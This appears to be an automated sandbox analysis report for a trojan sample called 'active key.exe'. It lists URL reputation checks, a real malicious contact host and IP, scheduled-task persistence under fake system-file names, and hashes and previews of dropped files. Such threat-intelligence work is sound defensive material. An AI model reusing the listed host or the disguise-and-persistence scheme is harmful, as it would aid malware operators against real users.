                    http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
                    http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe |
                    https://contoso.com/License | 0% | URL Reputation | safe |
                    https://contoso.com/Icon | 0% | URL Reputation | safe |
                    http://www.microsoft. | 0% | URL Reputation | safe |
                    https://curl.haxx.se/docs/http-cookies.html | 0% | URL Reputation | safe |
                    http://crl.m | 0% | URL Reputation | safe |
                    http://pki-ocsp.symauth.com0 | 0% | URL Reputation | safe |
                    http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe |
                    https://contoso.com/ | 0% | URL Reputation | safe |
                    https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
                    https://aka.ms/pscore68 | 0% | URL Reputation | safe |
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                    http://www.microsoft.co | 0% | Avira URL Cloud | safe |
                    http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe |
                    http://crl.microsJ | 0% | Avira URL Cloud | safe |
                    http://osoft.co | 0% | Avira URL Cloud | safe |
                    http://www.micom/pkiops/Docs/ry.htm0 | 0% | Avira URL Cloud | safe |
                    http://osoft.co | 0% | Virustotal | | Browse
                    http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal | | Browse
                    http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr | 0% | Avira URL Cloud | safe |
                    https://keyauth.win/api/1.1/ace | 0% | Avira URL Cloud | safe |
                    https://keyauth.win/api/1.1/pacec | 0% | Avira URL Cloud | safe |
                    http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl07 | 0% | Avira URL Cloud | safe |
                    https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe |
                    http://go.mic | 0% | Avira URL Cloud | safe |
                    https://keyauth.win/api/1.1/ | 0% | Avira URL Cloud | safe |
                    http://www.microsoft.co | 1% | Virustotal | | Browse
                    http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl07 | 0% | Virustotal | | Browse
                    https://keyauth.win/api/1.1/ace | 0% | Virustotal | | Browse
                    http://128538cm.n9shteam3.top/VmPipepacketupdateflowerAsyncDatalifeTempuploads.php | 100% | Avira URL Cloud | phishing |
                    https://keyauth.win/api/1.1/ | 0% | Virustotal | | Browse
                    https://github.com/Pester/Pester | 1% | Virustotal | | Browse
                    http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr | 0% | Virustotal | | Browse
                    http://128538cm.n9shteam3.top/VmPipepacketupdateflowerAsyncDatalifeTempuploads.php | 10% | Virustotal | | Browse
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    keyauth.win | 104.26.0.5 | true | false | | unknown
                    128538cm.n9shteam3.top | 80.211.144.156 | true | true | | unknown
                    Name | Malicious | Antivirus Detection | Reputation
                    http://128538cm.n9shteam3.top/VmPipepacketupdateflowerAsyncDatalifeTempuploads.php | true
                    • 10%, Virustotal, Browse
                    • Avira URL Cloud: phishing
                    unknown
                    IP | Domain | Country | ASN | ASN Name | Malicious
                    104.26.0.5 | keyauth.win | United States | 13335 | CLOUDFLARENETUS | false
                    80.211.144.156 | 128538cm.n9shteam3.top | Italy | 31034 | ARUBA-ASNIT | true
                    IP
                    127.0.0.1
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1502880
                    Start date and time:2024-09-02 13:32:08 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 10m 47s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:57
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:active key.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@59/50@2/3
                    EGA Information:
                    • Successful, ratio: 7.7%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, schtasks.exe
                    • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target XUkPLaESKIkbWXdxlvmVntDv.exe, PID 7672 because it is empty
                    • Execution Graph export aborted for target XUkPLaESKIkbWXdxlvmVntDv.exe, PID 7744 because it is empty
                    • Execution Graph export aborted for target active key.exe, PID 6424 because there are no executed function
                    • Execution Graph export aborted for target explorer.exe, PID 7200 because it is empty
                    • Execution Graph export aborted for target explorer.exe, PID 7224 because it is empty
                    • Execution Graph export aborted for target ntoskrnl2.exe, PID 7652 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 2348 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 3940 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 5112 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 5504 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 5676 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 6060 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    Time | Type | Description
                    07:33:20 | API Interceptor | 159x Sleep call for process: powershell.exe modified
                    07:33:41 | API Interceptor | 1721691x Sleep call for process: ntoskrnl2.exe modified
                    13:33:18 | Task Scheduler | Run new task: backgroundTaskHost path: "C:\Users\Public\Pictures\backgroundTaskHost.exe"
                    13:33:18 | Task Scheduler | Run new task: backgroundTaskHostb path: "C:\Users\Public\Pictures\backgroundTaskHost.exe"
                    13:33:18 | Task Scheduler | Run new task: explorer path: "C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe"
                    13:33:19 | Task Scheduler | Run new task: explorere path: "C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe"
                    13:33:19 | Task Scheduler | Run new task: fontdrvhost path: "C:\Windows\tracing\fontdrvhost.exe"
                    13:33:19 | Task Scheduler | Run new task: fontdrvhostf path: "C:\Windows\tracing\fontdrvhost.exe"
                    13:33:20 | Task Scheduler | Run new task: ntoskrnl2 path: "C:\Windows\System32\ntoskrnl2.exe"
                    13:33:20 | Task Scheduler | Run new task: ntoskrnl2n path: "C:\Windows\System32\ntoskrnl2.exe"
                    13:33:20 | Task Scheduler | Run new task: XUkPLaESKIkbWXdxlvmVntDv path: "C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe"
                    13:33:20 | Task Scheduler | Run new task: XUkPLaESKIkbWXdxlvmVntDvX path: "C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe"
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:ASCII text, with very long lines (795), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):795
                                                            Entropy (8bit):5.8926212448254764
                                                            Encrypted:false
                                                            SSDEEP:24:OEc8aS5zJaF/hT/bkdUhSmrM7JC2AinxAdCnk:OeIhTzknmrr2C
                                                            MD5:C9B5A4086C81C7B0FD4E5364ABCDD0BB
                                                            SHA1:7A0A41B862532F2BDCC210EB9D9C286282424D24
                                                            SHA-256:B80DB5B8C8FB76CDE88BA42FB561D27C4419357C294AA659AB52423DCC49DE6B
                                                            SHA-512:E64497C28777E40C08923156ED69C1524A09208C6D0E26244DF99AE7BAE5BDF14F69CE8533522DC92B84159077C01AEB06930B217E00595D93585C272EFC8E7E
                                                            Malicious:false
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                            Category:dropped
                                                            Size (bytes):1430164
                                                            Entropy (8bit):7.968311057541044
                                                            Encrypted:false
                                                            SSDEEP:24576:qQnFtu+zlSu7WlmZuTJ8BNTnCe2RmndNY2ncoC8OOGOFqZjkJe6QvX:Hpz7BNBNTnx2azxcoBrZS3fP
                                                            MD5:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                            SHA1:20E0CFFE94951E3201CA5AA3F5A2876B20408702
                                                            SHA-256:6EBED9F6DE82360A3724C5148EAACED3273CE3E48826492D87DA9D7E978EB6FC
                                                            SHA-512:B93AADA5CDF824C5FEB5C2A992A92CB929479241E7895C42C8A6AF32B11C72767523D4ABD641C44A0B2E310288E533F7AEEF3F1931023AC72154171BC83D2CC0
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                            • Antivirus: Virustotal, Detection: 75%, Browse
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:ASCII text, with very long lines (452), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):452
                                                            Entropy (8bit):5.85366364833806
                                                            Encrypted:false
                                                            SSDEEP:12:h4LycM22qpwzpe7Am1/d57jw9CE2pu8ggLQq73lKT7n:IrMLzM7V5dZdBgkS
                                                            MD5:4DB9F6AA671DBA42B2A99D3384212A59
                                                            SHA1:1D34B5EB7FB1890F7254E292D811CEC49F71306A
                                                            SHA-256:1C9923E563CFB3238798D7F594BF1E85DFD517E353312B594705770FC13E2108
                                                            SHA-512:6B07800D80EFC863A33318646880C5CC3FEE765C2C5DFBC7286463F4CB651DBE95C74673C123A7421A1C7450E97A87A2B21DE6A4C42F6A9328431B3919027719
                                                            Malicious:false
                                                            Preview:jaexxt6IoDE1BrWgzs1e7QhAZK2XEBQMeUwkP4sbWlVpVhfHkqLueQeS2eXm0jEmx2Xq5vR49ZIV52o2pvwYzfrNzdsuhFkwhs2dJyMyYQvFIJXA0e7FwpwRKJ0bDhX3yVxN9Lt0i8AjumFqGr4CIf915lS97vu031QwVJApvHgypNhiEKUWnUvTV6RY2t2xNJp3VSU6rPQA8KMrDu4xaYNjF6bZ1mwCPtlginMwzXpYDuVKukUIyFXy6GxZ05EEcOvPjpJahI7CtyfUlQpRRoOKWwkbzx54Sk6z8GlEb4kpHUFHldxkPxwy9l3wFrkuNDtI2pWfpl0XDiCBqc0W9UofxHzWNy8uT0cEl6O5GR5o6Zubj1Gn0Nu2YOVvz9S0nGDNF7atO5PsZ9iYXYxVsU3GGkpXldFH9EB0VhVlbWY47CcYp6XbM7ISM7HfSDHvzIsV
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                            Category:dropped
                                                            Size (bytes):1430164
                                                            Entropy (8bit):7.968311057541044
                                                            Encrypted:false
                                                            SSDEEP:24576:qQnFtu+zlSu7WlmZuTJ8BNTnCe2RmndNY2ncoC8OOGOFqZjkJe6QvX:Hpz7BNBNTnx2azxcoBrZS3fP
                                                            MD5:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                            SHA1:20E0CFFE94951E3201CA5AA3F5A2876B20408702
                                                            SHA-256:6EBED9F6DE82360A3724C5148EAACED3273CE3E48826492D87DA9D7E978EB6FC
                                                            SHA-512:B93AADA5CDF824C5FEB5C2A992A92CB929479241E7895C42C8A6AF32B11C72767523D4ABD641C44A0B2E310288E533F7AEEF3F1931023AC72154171BC83D2CC0
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                            • Antivirus: Virustotal, Detection: 75%
                                                            Preview:MZ......................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:ASCII text, with very long lines (711), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):711
                                                            Entropy (8bit):5.881168638492327
                                                            Encrypted:false
                                                            SSDEEP:12:lUuYQ70LYrhR0W2PCztbUIJLkcCmbQkA1zkD+EJNsd1mEkRIRlKct5S971g8k1:nYpLYrhSWACFUQLkcKkPJNs5kRIucvSS
                                                            MD5:6B411C0574CE8715EED0EF793B33FA2A
                                                            SHA1:8EDDDFFCFBF035496999715D28AB73086CFC3A87
                                                            SHA-256:7994A1631EA96C8BF48B7D84A1D67922BAA00AC99210BCA12F70A507FF5E552A
                                                            SHA-512:65D230756DCFB1008E583834D2DD716EDC87EF07C6584FF03E594F2F7AA8729FDEA5D5B706AA0AAFDC5CF64371A82953BC1B9AFDC9C25D4EA3C0243A34BD4ED2
                                                            Malicious:false
                                                            Process:C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):1281
                                                            Entropy (8bit):5.370111951859942
                                                            Encrypted:false
                                                            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                            MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                            Process:C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):1281
                                                            Entropy (8bit):5.370111951859942
                                                            Encrypted:false
                                                            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                            MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):1740
                                                            Entropy (8bit):5.36827240602657
                                                            Encrypted:false
                                                            SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKk+HKlT4vHNpv:iq+wmj0qCYqGSI6oPtzHeqKk+qZ4vtpv
                                                            MD5:1152A0332636E97D888ECFF02C1B19A9
                                                            SHA1:365D4052647A8B9BCC0512CBCFB12279316549FD
                                                            SHA-256:C72695BD822EB0EB112850B84D7ABBD5BADF07C3A0A670422D9DA3620BAE6EB4
                                                            SHA-512:9FFC281DBF24C21DDEC4BE93941339B7601AD12C24D11176668DBDFD0AD5826FDA463620BF9E129030D9119BF9A9E21C45A999F31249AA9BD65B85546783AD28
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:modified
                                                            Size (bytes):64
                                                            Entropy (8bit):1.1940658735648508
                                                            Encrypted:false
                                                            SSDEEP:3:Nlllultnxj:NllU
                                                            MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                            SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                            SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                            SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                            Malicious:false
                                                            Preview:@...e................................................@..........
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
